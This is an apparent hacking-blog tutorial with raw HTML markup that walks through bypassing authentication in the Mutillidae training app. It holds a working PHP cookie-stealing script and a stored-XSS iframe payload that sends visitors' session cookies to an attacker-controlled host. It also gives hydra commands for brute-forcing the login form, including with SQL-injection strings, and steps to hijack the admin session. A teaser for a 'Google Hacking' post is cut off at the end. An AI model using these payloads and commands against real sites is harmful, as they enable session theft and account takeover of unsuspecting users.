BROKEN AUTHENTICATION & SESSION MANAGEMENT IN MUTILLIDAE

<div dir="ltr" style="text-align: left;" trbidi="on"> <h1 class="post-title entry-title" style="background-color: white; border: 0px; color: #454545; font-family: Oswald, arial, serif; font-size: 30px; font-weight: 400; line-height: 1.2; margin: 0px; outline: none medium; padding: 0px 0px 5px; text-transform: uppercase; vertical-align: baseline;"> <br /></h1> <br /><span style="background-color: white; font-family: 'Maven Pro', Arial, sans-serif; font-size: 14px; line-height: 22.399999618530273px;"></span><br /> <div class="post-body entry-content" style="background-color: white; border: 0px; font-family: 'Maven Pro', Arial, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin: 0px 0px 0.75em; outline: none medium; overflow: hidden; padding: 5px 0px 0px; vertical-align: baseline;"> <div style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 10px 0px; vertical-align: baseline;"> <div style="border: 0px; float: right; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline; width: 250px;"> <ul class="cbtsharethis" style="border: 0px; float: left; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: none outside none; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <li class="stumble" style="background: none 0px 0px repeat scroll transparent; border: 0px; font-family: inherit; font-size: 16px; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 5px 0px 0px; outline: none medium; padding: 0px; vertical-align: baseline;"></li> <li class="delicious" style="background: none 0px 0px repeat scroll transparent; border: 0px; font-family: inherit; font-size: 16px; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 5px 0px 0px; outline: none medium; padding: 0px; vertical-align: baseline;"><br /></li> <li class="digg" style="background: none 0px 0px repeat scroll transparent; border: 0px; font-family: inherit; font-size: 16px; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 5px 0px 0px; outline: none medium; padding: 0px; vertical-align: baseline;"><br /></li> </ul> </div> </div> <div dir="ltr" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;" trbidi="on"> Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.<br style="outline: none medium;" /><br style="outline: none medium;" /><ul style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: none outside none; margin: 10px 0px 10px 20px; outline: none medium; padding: 0px; vertical-align: baseline;"> <li style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL9jY0auceyiNDg68-jq7fJMEGhhEELxGtbKF6KPgSYnguAleEY3HD0J4GdLSdfUKUhYOaVAromAOj1KnHQOhUIlVYkOewkhI8WBeKcHhettx7ewUCcdIshYQ0CbiopVgxkRWO7s4D-UGw/s24/w2b_bloggerbullet.png) 0% 50% no-repeat scroll transparent; border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 7px 0px; outline: none medium; padding: 0px 0px 0px 30px; vertical-align: baseline;">Authentication Bypass</li> <li style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL9jY0auceyiNDg68-jq7fJMEGhhEELxGtbKF6KPgSYnguAleEY3HD0J4GdLSdfUKUhYOaVAromAOj1KnHQOhUIlVYkOewkhI8WBeKcHhettx7ewUCcdIshYQ0CbiopVgxkRWO7s4D-UGw/s24/w2b_bloggerbullet.png) 0% 50% no-repeat scroll transparent; border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 7px 0px; outline: none medium; padding: 0px 0px 0px 30px; vertical-align: baseline;">Privilege Escalation</li> <li style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL9jY0auceyiNDg68-jq7fJMEGhhEELxGtbKF6KPgSYnguAleEY3HD0J4GdLSdfUKUhYOaVAromAOj1KnHQOhUIlVYkOewkhI8WBeKcHhettx7ewUCcdIshYQ0CbiopVgxkRWO7s4D-UGw/s24/w2b_bloggerbullet.png) 0% 50% no-repeat scroll transparent; border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 7px 0px; outline: none medium; padding: 0px 0px 0px 30px; vertical-align: baseline;">Username Enumeration</li> </ul> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" />We have already covered <a href="http://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Username enumeration</a> in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <ol style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: none; margin: 10px 0px 10px 30px; outline: none medium; padding: 0px 0px 0px 10px; vertical-align: baseline;"> <li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 18px; list-style: decimal outside none; margin: 7px 0px; outline: none medium; padding: 0px; vertical-align: baseline;">Using cookie</li> <li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 18px; list-style: decimal outside none; margin: 7px 0px; outline: none medium; padding: 0px; vertical-align: baseline;">Using brute-force</li> <li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 18px; list-style: decimal outside none; margin: 7px 0px; outline: none medium; padding: 0px; vertical-align: baseline;">Using SQL injection</li> </ol> <h3 style="-webkit-box-shadow: rgb(170, 170, 170) 1px 1px 2px; background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-bottom-style: solid; border-top-left-radius: 0px; border-top-right-radius: 0px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; color: #333333; font-family: 'Yanone Kaffeesatz', arial, serif; font-size: 20px; font-style: inherit; font-variant: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;"> (1)Authentication Bypass Using Cookie:- </h3> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> As we know that , mutillidae is vulnerable to <a href="http://tipstrickshack.blogspot.com/2012/10/how-to-do-xss-attack-on-website.html" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">XSS</a>, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.<br style="outline: none medium;" /><br style="outline: none medium;" />http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php<br style="outline: none medium;" /><br style="outline: none medium;" />Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.<br style="outline: none medium;" /><br style="outline: none medium;" />Content of cookie_catcher.php :-<br style="outline: none medium;" /><br style="outline: none medium;" /><?php<br style="outline: none medium;" />header ("Location: http://192.168.56.1");<br style="outline: none medium;" />$cookie = $_GET['c'];<br style="outline: none medium;" />$ip = getenv ('REMOTE_ADDR');<br style="outline: none medium;" />$date=date("j F, Y, g:i a");;<br style="outline: none medium;" />$referer=getenv ('HTTP_REFERER');<br style="outline: none medium;" />$fp = fopen('cookies.html', 'a');<br style="outline: none medium;" />fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');<br style="outline: none medium;" />fclose($fp);<br style="outline: none medium;" />?><br style="outline: none medium;" /><br style="outline: none medium;" />Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.</div> <a href="https://www.blogger.com/null" name="more" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"></a><br style="outline: none medium;" />Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.<br style="outline: none medium;" /><br style="outline: none medium;" />(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php<br style="outline: none medium;" /><br style="outline: none medium;" />(2)Submit following html to blog<br style="outline: none medium;" /><div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <html><br style="outline: none medium;" /><body><br style="outline: none medium;" /><b> nirav k desai</b><br style="outline: none medium;" /><u>help me</u><br style="outline: none medium;" /><iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe ><br style="outline: none medium;" /></body><br style="outline: none medium;" /></html></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-FiEu-uziNDhsPO7U50gem5WyVL4PtyyskNeL6OcUhSD4xcjhUiUExTzb_U57q54_nLIZ0Sj57jvEwj6BwTTNVbC2sRV32TaEW5bLP4dso-AzFwv_YrYieFhRVKNnBx6cQ7er3ypC3ci/s1600/attacker.png" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="authentication-bypass-using-cokkie" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-FiEu-uziNDhsPO7U50gem5WyVL4PtyyskNeL6OcUhSD4xcjhUiUExTzb_U57q54_nLIZ0Sj57jvEwj6BwTTNVbC2sRV32TaEW5bLP4dso-AzFwv_YrYieFhRVKNnBx6cQ7er3ypC3ci/s320/attacker.png" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="authentication-bypass-using-cokkie" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php<br style="outline: none medium;" /><br style="outline: none medium;" />(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilJgNEhpS28nmcOPI8pBuc4IaTcKRw-sOcpiCV7FthFhyPE49LM0QX6GzxGw-7Bs0xf1-et0LMCFJxdAT6iGelA0nX4S4sZq6-D05Ap1n-TOJVxfCm1SRwgksIIehmw2MPnX_XlX9-1x9e/s1600/admin.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="persistent-xss" border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilJgNEhpS28nmcOPI8pBuc4IaTcKRw-sOcpiCV7FthFhyPE49LM0QX6GzxGw-7Bs0xf1-et0LMCFJxdAT6iGelA0nX4S4sZq6-D05Ap1n-TOJVxfCm1SRwgksIIehmw2MPnX_XlX9-1x9e/s320/admin.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="persistent-xss" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> (4)To view cookie open cookie.html.</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinseOdO1qwfunHkK6YNa8b5fJZgrqh-eaGpSwKLGg2uOfMOEy1VH6JE5gyDBtBHPYpBX9Hf-Yea4D6w2y3uTtoDqdDLTD2LfqRBA9uS2J-YsKwjUGH5TPEeA_jPrlEABl8vUpy8Q-KLQxn/s1600/cookie.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="cookie-catcher" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinseOdO1qwfunHkK6YNa8b5fJZgrqh-eaGpSwKLGg2uOfMOEy1VH6JE5gyDBtBHPYpBX9Hf-Yea4D6w2y3uTtoDqdDLTD2LfqRBA9uS2J-YsKwjUGH5TPEeA_jPrlEABl8vUpy8Q-KLQxn/s320/cookie.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="cookie-catcher" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">  </div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> (5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpNTzHrL1sLHKGqQrPIA-RVI-_Moh6mSs3uRt0k6vz5vp3kQOmBNvDG7Sp3d4Fgvuo9JWuL8vOepuzBoOa9QXcXIavuFOBqR1X4wCeZAC94-ch92nK9gEQJVHW6H9JitLajfFrKNMToxNP/s1600/cookie-manager.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="cookie-manager" border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpNTzHrL1sLHKGqQrPIA-RVI-_Moh6mSs3uRt0k6vz5vp3kQOmBNvDG7Sp3d4Fgvuo9JWuL8vOepuzBoOa9QXcXIavuFOBqR1X4wCeZAC94-ch92nK9gEQJVHW6H9JitLajfFrKNMToxNP/s320/cookie-manager.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="edit-cookie" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" />(6)After reload we got admin access to web-application.</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjTDqsjwU9UKzdHNi-81sLB4sVNZYzaG69I24sq8KZ1l4Ubbdi7ZbqbRlwkyLwKQDvuXZQb-4AzP9lHGngeoB1td5dqYOliMpmlKmO7xszg0ytkfYM1IfYWFBvKX2zmsR28Li-ms2LbZ7P/s1600/admin_access.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="admin-access" border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjTDqsjwU9UKzdHNi-81sLB4sVNZYzaG69I24sq8KZ1l4Ubbdi7ZbqbRlwkyLwKQDvuXZQb-4AzP9lHGngeoB1td5dqYOliMpmlKmO7xszg0ytkfYM1IfYWFBvKX2zmsR28Li-ms2LbZ7P/s320/admin_access.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="admin-access" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div> <h3 style="-webkit-box-shadow: rgb(170, 170, 170) 1px 1px 2px; background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-bottom-style: solid; border-top-left-radius: 0px; border-top-right-radius: 0px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; color: #333333; font-family: 'Yanone Kaffeesatz', arial, serif; font-size: 20px; font-style: inherit; font-variant: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;"> (2)Authentication Bypass Using Bruteforce:- </h3> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> You can use hydra or burpe intruder to bruteforce login form of application.<br style="outline: none medium;" /><br style="outline: none medium;" />hydra -l admin -P /root/pass.txt  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_8WjszRpgkR4ZxCiK4CG2lSHKlkD8qjehvk_F8hvu3VkSzi0EvNFANBXWBwcy_Qj1KinT1JAyV4dt2ir3IUpgO3-puvcUbqXyptTX1dU3orricsELBNmQxMNIJoH4K6eocCKS04MpBF-/s1600/bruteforce.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Bruteforce-Using-Hydra" border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_8WjszRpgkR4ZxCiK4CG2lSHKlkD8qjehvk_F8hvu3VkSzi0EvNFANBXWBwcy_Qj1KinT1JAyV4dt2ir3IUpgO3-puvcUbqXyptTX1dU3orricsELBNmQxMNIJoH4K6eocCKS04MpBF-/s320/bruteforce.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Bruteforce-Using-Hydra" width="320" /></a></div> <h3 style="-webkit-box-shadow: rgb(170, 170, 170) 1px 1px 2px; background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-bottom-style: solid; border-top-left-radius: 0px; border-top-right-radius: 0px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; color: #333333; font-family: 'Yanone Kaffeesatz', arial, serif; font-size: 20px; font-style: inherit; font-variant: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;"> (3)Authentication Bypass Using Sql Injection:- </h3> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to  login form.<br style="outline: none medium;" /><br style="outline: none medium;" />You can use <a href="http://tipstrickshack.blogspot.com/2013/01/sql-injection-authentication-bypass.html" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">SQL injection cheat sheet </a>& we will brute-force  using SQL statements.Save it to file.<br style="outline: none medium;" /><br style="outline: none medium;" />hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"</div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div class="separator" style="border: 0px; clear: both; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrganABxyyiLUW0O4wtjqYxIcvFSKCKtcT_m2x2iox29O9kyjlyIm2t-vWRjdapDnvKPHG5e7sBy_QIdWBcmLzHTfG92RlviPZVHLNwjpa9-YjLDqkXPECpil6nhATALMiNYlVetdXdIND/s1600/SQL.PNG" imageanchor="1" style="border: 0px; color: #2a7295; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="SQL-injection_cheat-sheet" border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrganABxyyiLUW0O4wtjqYxIcvFSKCKtcT_m2x2iox29O9kyjlyIm2t-vWRjdapDnvKPHG5e7sBy_QIdWBcmLzHTfG92RlviPZVHLNwjpa9-YjLDqkXPECpil6nhATALMiNYlVetdXdIND/s320/SQL.PNG" style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="SQL-injection_cheat-sheet" width="320" /></a></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> <br style="outline: none medium;" /></div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div> <div style="border: 0px; font-family: inherit; font-size: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> And we got for valid SQL statements ; with help of it we can bypass admin panel.</div> </div> </div> </div>

BROKEN AUTHENTICATION & SESSION MANAGEMENT IN MUTILLIDAE

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it conta...

Read more »

Hack using Google Search Engine

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <br />One of the ways to attack on webserver is "<b>Google Hacking</b>".<br /><br /><br />As we all know, Google is a Search Engine.<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdhkvW8NPhqIjWjhRVMeC4P8Om8loQvmA1BhtwEH9D-Imv0YVaENTXPKpR46WqEJ7czcdEQ9j4fuKNUgOo84kofLzpdjmdQpjLhW1WrTgCFJlEJdyu8m3ThKu63-HuxxFiBoodABDGNnk/s1600/gh5.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="209" 